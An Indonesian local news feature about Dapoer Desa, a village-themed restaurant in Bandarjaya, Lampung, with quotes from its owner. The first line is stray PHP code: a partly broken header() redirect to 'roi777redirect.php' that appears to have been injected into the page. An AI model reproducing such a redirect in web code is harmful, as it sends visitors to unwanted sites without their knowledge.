header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Spot Pedesaan Dapoer Desa Digemari Pengunjung -
Spot Pedesaan Dapoer Desa Digemari Pengunjung

ASRI : Dapoer Desa menyuguhkan suasana desa yang asri sebagai tempat makan yang baru di Bandarjaya.

TRANSLAMPUNG.COM, BANDARJAYA – Mungkin anda bosan dengan tempat makan yang biasa dikunjungi. Nach,sekarang ada yang beda jika Anda temukan di Dapoer Desa.Memasuki pintu masuk suguhan perabotan dapur mulai caping, tempat nasi dan sapu-sapu lidi.Pohon bambu sampai pelapah kayu menjadi spot yang dipilih para pengunjung untuk selfie ria. Dapoer Desa menjadi tempat paling terbaru di Bandarjaya yang buka sejak April 2018 ini. Dengan sajian menu ayam bakar dan pempek sutra Anda bisa menikmati menu dan suasa beda.

Owner Dapoer Desa Bandarjaya Hartini memaparkan tempat ini sengaja dibuka untuk semua kalangan baik keluarga maupun anak muda. ” Kami sengaja mengemas suasana pedesaan untuk menciptakan nuansa makan yang lebih nikmat bagi pengunjung, dengan fasilitas fullmusik dan tempat makan lesehan,tempat kami selalu ramai dikunjungi terutama pada akhir pekan,” paparnya.

Sebagai pengembangan usaha kuliner Dapoer Desa sudah mempersiapkan cabang baru di Bandar Lampung dan Kota Metro. Silahkan buktikan bedanya bersantap disini bersama keluarga juga rekan kerja anda sambil berselifie ria dan menikmati menu unggulan dari makanan dan minuman segar,baik untuk acara keluarga atau nongkrong santai bersama teman. (*/rid)

 

News Reporter